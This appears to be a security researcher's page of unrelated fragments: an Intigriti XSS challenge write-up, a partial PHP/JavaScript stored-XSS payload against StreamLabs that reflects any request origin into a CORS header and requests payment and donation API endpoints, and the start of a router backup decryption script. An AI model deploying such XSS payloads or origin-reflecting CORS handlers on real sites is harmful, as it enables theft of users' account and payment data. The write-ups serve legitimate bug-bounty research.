NRockhouse

Hey again (Inti)griti, hope y'all are doing well. Thanks for the challenge as usual.

Vulnerability

The main vulnerability is a very limited XSS on line 41, whereby arbitrary data from the r URL inserted is appended into the DOM as such ({url} being the injection point).

If you're not being redirected, click <a href=${url}>here</a>

However, it is limited by two checks in place.

1. Every single property in both window and document object is checked for the keyword javascript. If found, the property is deleted entirely, leaving it undefined (and possibly causing runtime errors). [line 5-11]

NRockhouse

Proof of Concept / description

Attacker needs to give victim a malicious link that he controls in order to exploit the vulnerability.

Live PoC: ██████████

Code I used

<body></body>

NRockhouse

<?php header("Access-Control-Allow-Origin: " . $_SERVER['HTTP_ORIGIN']);
header("Content-Type: text/plain; charset=UTF-8"); ?>
this.style.display = "none";
alert("StreamLabs.Stored.XSS.Vulnerability-Cheat.Activated!-Alert");
var getLinks = ["https://api.ipify.org", "/api/v5/payment/status", "/api/v5/donation/all"];
var msg = "";
var xhr = new XMLHttpRequest();
var xsrfToken = "";
xhr.open("GET", "https://api.ipify.org", false);
xhr.send();

NRockhouse

#!/usr/bin/python

# =============================================================
#  Telekom Malaysia (TM) Innacomm ADSL-MARITIME-W3410N 
#  Router Configuration Settings Backup File Decryption Tool
#
#  This Python script is used to decrypt the backup configuration 
#  settings file of the TM Innacomm ADSL-MARITIME-W3410N (which 
#  is apparently a rebranded PROLiNK ADSL2 PRS1241B modem according 
#  to blog.fpmurphy.com). The usage is pretty self-explanatory